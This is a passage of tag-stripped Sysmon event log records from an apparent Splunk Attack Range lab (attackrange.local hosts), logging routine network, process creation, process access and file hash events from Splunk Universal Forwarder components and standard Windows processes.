AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51932-false10.0.1.12-8000- 23542300x8000000000000000107785Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:02.950{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C5841FB38D2AF0BEBD0B5938BAC4C09,SHA256=9FDD0BEFFDA60612EC689E8F9F1435E58BD0F66335E2B2FFF697FEB8DA58EBF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083659Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:02.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D21413675E88335C82A6F7C11664F70,SHA256=DFB14821C58D8AEDAA8EDB24F3112A1D69F1661FFA274E24F97EF5D8DD0575BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107784Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:02.229{58E9C193-B535-615A-6502-00000000FC01}73481360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107783Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:02.007{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B535-615A-6502-00000000FC01}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107782Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.991{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107781Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.991{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107780Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.991{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107779Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.991{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107778Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.991{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B535-615A-6502-00000000FC01}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107777Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.991{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B535-615A-6502-00000000FC01}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107776Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.997{58E9C193-B535-615A-6502-00000000FC01}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083658Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:59.692{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50183-false10.0.1.12-8000- 23542300x8000000000000000107805Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.997{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E424D30AD3F9BF5E50D1E1237FDBBDC,SHA256=45606F1FCF8C2D45A00B8D6FBE38D7CA6EE46E495E4D609619B1550EE2DD81EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083660Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:03.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D9711CD7F12A7516D4936E4F205FC4,SHA256=338DCF7E10F5B355963F25CCEF8BEDB0CD1E4050620A7E29BBA9426B6BE07D94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107804Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B537-615A-6702-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107803Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107802Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107801Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107800Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107799Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B537-615A-6702-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107798Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B537-615A-6702-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107797Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.797{58E9C193-B537-615A-6702-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000107796Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.297{58E9C193-B537-615A-6602-00000000FC01}75965636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107795Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B537-615A-6602-00000000FC01}7596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107794Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107793Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107792Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107791Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107790Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B537-615A-6602-00000000FC01}7596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107789Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.097{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B537-615A-6602-00000000FC01}7596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107788Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:03.099{58E9C193-B537-615A-6602-00000000FC01}7596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 